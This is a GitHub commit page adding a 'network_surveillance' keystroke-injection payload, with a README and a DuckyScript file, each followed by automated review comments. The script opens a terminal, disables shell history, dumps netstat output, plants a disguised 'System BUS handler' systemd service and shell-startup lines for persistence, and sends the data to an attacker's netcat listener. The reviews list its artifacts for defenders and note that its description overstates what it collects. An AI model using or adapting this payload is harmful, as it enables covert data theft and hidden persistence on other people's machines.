uploading network_surveillance payload

network_surveillance payload exfiltrates network connections, routing tables, interface statistics, masquerade connections, and multicast memberships.
pull/190/head
drapl0n 2023-07-09 19:58:03 +05:30 committed by GitHub
parent 868962cae9
commit 0981da652b
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
2 changed files with 55 additions and 0 deletions

@ -0,0 +1,33 @@
## About:
* Title: network_surveillance
* Description: network_surveillance payload exfiltrates network connections, routing tables, interface statistics, masquerade connections, and multicast memberships.
* AUTHOR: drapl0n
* Version: 1.0
* Category: Exfiltaration
* Target: Unix-like operating systems with systemd.
* Attackmodes: HID.
## network_surveillance: network_surveillance payload exfiltrates network connections, routing tables, interface statistics, masquerade connections, and multicast memberships.
### Features:
* Exfiltrates network connections, routing tables, interface statistics, masquerade connections, and multicast memberships.
* Fully Persistent.
* Waits for target to get online.
* Transfers loot once target is online.
* Oneliner payload.
### Workflow:
1. Extracts network information.
2. Creating Loot transfer mechanism in targets system.
3. Creating local systemd service for persistence.
4. Executing Autotart mechanism.
### Usage:
1. Run netcat listner on attacking machine: `nc -lvp <port number> > <output_filename>`
2. Example: `nc -lvp 4444 > network_surveillance.txt
### Changes to be made:
* Replace IP address(twice) `0.0.0.0` and Port Number `4444` on line `15`.
#### Support me if you like my work:
* https://twitter.com/drapl0n
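Review bot: The Description and Features bullets promise routing tables, interface statistics, masquerade connections and multicast memberships, but the only collection commands in the payload file added by this commit are `netstat -antup` and `netstat -nlp`, which list sockets and listeners. The description should be narrowed to what the payload actually collects. The README also documents "Fully Persistent" without any removal procedure; a cleanup section is needed so that whoever runs this in an authorized engagement can restore the host afterwards. Smaller points: "Exfiltaration" under Category, "Autotart" in Workflow step 4 and "listner" in Usage step 1 are misspelled, the inline code in Usage step 2 is missing its closing backtick, and the Target line ("Unix-like operating systems with systemd") disagrees with the payload header ("GNU/Linux").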

@ -0,0 +1,22 @@
REM Title: network_surveillance
REM Description: network_surveillance payload exfiltrates network connections, routing tables, interface statistics, masquerade connections, and multicast memberships.
REM AUTHOR: drapl0n
REM Version: 1.0
REM Category: Exfiltration.
REM Target: GNU/Linux.
REM Attackmodes: HID.
DELAY 2000
CTRL ALT t
DELAY 1000
STRING unset HISTFILE
ENTER
DELAY 200
STRING echo -e "#\!/bin/bash\nmkdir -p ~/.config/systemd/user\nmkdir -p /var/tmp/.system\nnetstat -antup >> /tmp/exfil\nnetstat -nlp >> /tmp/exfil\necho -e \"while :\\\ndo\\\n\\\tping -c 5 127.0.0.1\\\n\\\tif [ \\\$? -eq 0 ]; then\\\n\\\t\\\tnc -c 127.0.0.1 4444 < /tmp/exfil\\\n\\\tfi\\\ndone\" > /var/tmp/.system/systemBus\nchmod +x /var/tmp/.system/systemBus\necho -e \"[Unit]\\\nDescription= System BUS handler\\\n\\\n[Service]\\\nExecStart=/bin/bash /var/tmp/.system/systemBus -no-browser\\\nRestart=on-failure\\\nSuccessExitStatus=3 4\\\nRestartForceExitStatus=3 4\\\n\\\n[Install]\\\nWantedBy=default.target\" > ~/.config/systemd/user/systemBUS.service\nsystemctl --user enable --now systemBUS.service\nsystemctl --user start --now systemBUS.service\necho -e \"ls -a ~/ | grep 'zshrc' &> /dev/null\\\nif [ \\\$? = 0 ]; then\\\n\\\techo \"systemctl --user enable --now systemBUS.service\" >> ~/.zshrc\\\nfi\\\nls -a ~/ | grep 'bashrc' &> /dev/null\\\nif [ \\\$? = 0 ]; then\\\n\\\techo \"systemctl --user enable --now systemBUS.service\" >> ~/.bashrc\\\nfi\" > /tmp/tmmmp\nchmod +x /tmp/tmmmp && /tmp/./tmmmp && rm /tmp/tmmmp" > /tmp/system
ENTER
DELAY 200
STRING chmod +x /tmp/system
ENTER
DELAY 200
STRING /tmp/./system && rm /tmp/system && exit
ENTER
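Review bot: The long STRING line leaves state on the host that nothing in this commit removes or documents: the collected output stays in `/tmp/exfil`, a script is written to `/var/tmp/.system/systemBus`, a user unit `~/.config/systemd/user/systemBUS.service` is enabled, and a `systemctl --user enable --now systemBUS.service` line is appended to `~/.bashrc` and `~/.zshrc`. Only `/tmp/system` and `/tmp/tmmmp` are deleted. These paths should be listed as the artifacts of a run, both for cleanup after an authorized test and as the indicators a defender would check for, together with the `unset HISTFILE` typed at the start of the session. Style points on the same line: `systemctl --user start --now` follows an `enable --now` that already starts the unit, and the `-no-browser` argument in `ExecStart` is passed to a script that reads no arguments. The header comments also say Category "Exfiltration." and Target "GNU/Linux.", which do not match the README added in the same commit.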